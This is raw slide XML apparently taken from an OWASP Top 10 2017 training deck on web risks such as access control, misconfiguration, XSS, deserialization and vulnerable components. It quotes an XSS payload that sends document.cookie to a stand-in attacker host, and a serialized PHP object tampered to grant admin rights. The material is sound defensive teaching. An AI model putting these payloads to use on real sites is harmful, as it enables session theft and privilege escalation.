                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tools can detect the absence of access control but cannot verify if it is functional when it is present. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain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sz="90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 Manual testing is the best way to detect missing or ineffective access control, including HTTP method (GET vs PUT, etc), controller, direct object references, etc.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" rtl="0">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900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The technical impact is attackers acting as users or administrators, or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Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory listing is not disabled on the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Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The application server’s configuration allows de-tailed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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This allows sensitive data stored within cloud storage to be accessed.</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sz="90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The software is out of date or vulnerable (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="90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ru-RU" sz="90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550" indent="-8255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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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7"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>V19 Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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ru-RU" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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9"/>
              </a:rPr>
              <a:t>NIST Guide to General Server Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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0"/>
              </a:rPr>
              <a:t>CWE-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Environmental Security Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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1"/>
              </a:rPr>
              <a:t>CWE-16: Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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2"/>
              </a:rPr>
              <a:t>CWE-388: Error Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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3"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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4"/>
              </a:rPr>
              <a:t>Amazon S3 Bucket Discovery and Enumeration</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ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Sending security directives to clients, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Security Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A6</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36991629"/>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Exploitability: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Prevalence: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Detectability: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Technical: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ru-RU" sz="90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 unused pages, unprotected files and directories, etc to gain unauthorized access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ru-RU" sz="90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ru-RU" sz="90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ru-RU"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Scenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='creditcard' type='TEXT'</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value=</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 + request.getParameter("CC") +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&gt;&lt;script&gt;document.location=</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http://www.attacker.com/cgi-bin/cookie.cgi?</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foo=</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+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.</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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Encode Data</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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Validate Data</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Stored XSS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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for DOM XSS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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Prevention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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: DOM based XSS Prevention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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Filter Evasion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2"/>
              </a:rPr>
              <a:t>OWASP Java Encoder Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"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3"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input</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4"/>
              </a:rPr>
              <a:t>PortSwigger: Client-side template injection</a:t>
            </a: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ru-RU" sz="90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ru-RU"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ru-RU"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ru-RU" sz="90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ru-RU"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p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"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ru-RU" sz="90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ru-RU"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ru-RU"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ru-RU" sz="9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5"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A7</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81865451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Exploitability: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Prevalence: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Detectability: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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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90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sz="90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ru-RU" sz="90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rPr>
              <a:t>Typical data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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rPr>
              <a:t>Remote- and inter-process communication (RPC/IPC) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1"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rPr>
              <a:t>HTTP cookies, HTML form parameters, API authentication tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="900">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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  a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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4"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Deserialization</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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Validate All Inputs</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ru-RU" sz="90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8"/>
              </a:rPr>
              <a:t>OWASP AppSecUSA 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"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9"/>
              </a:rPr>
              <a:t>CWE-502: Deserialization of Untrusted Data</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0"/>
              </a:rPr>
              <a:t>Java Unmarshaller Security</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1"/>
              </a:rPr>
              <a:t>OWASP AppSec Cali 2015: Marshalling Pickles</a:t>
            </a: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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The only safe architectural pattern is not to accept serialized objects from untrusted sources or to use serialization mediums that only permit primitive data types.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If that is not possible, consider one of more of the following:</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Implementing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Enforcing strict type constraints during deserialization before object creation as the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Isolating and running code that deserializes in low privilege environments when possible.</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Logging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Restricting or monitoring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Monitoring deserialization, alerting if a user deserializes constantly.</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A8</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389945480"/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</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Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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Technical: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b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>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ru-RU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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sz="90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ru-RU" sz="1400" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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Shodan IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:endParaRPr lang="ru-RU"/>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r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="900">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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r>
              <a:rPr lang="ru-RU" sz="800" b="1">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2"/>
              </a:rPr>
              <a:t>OWASP Virtual Patching Best Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1">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5"/>
              </a:rPr>
              <a:t>National Vulnerability Database (NVD)</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7"/>
              </a:rPr>
              <a:t>Node Libraries Security Advisories</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ru-RU" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>and Tools</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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
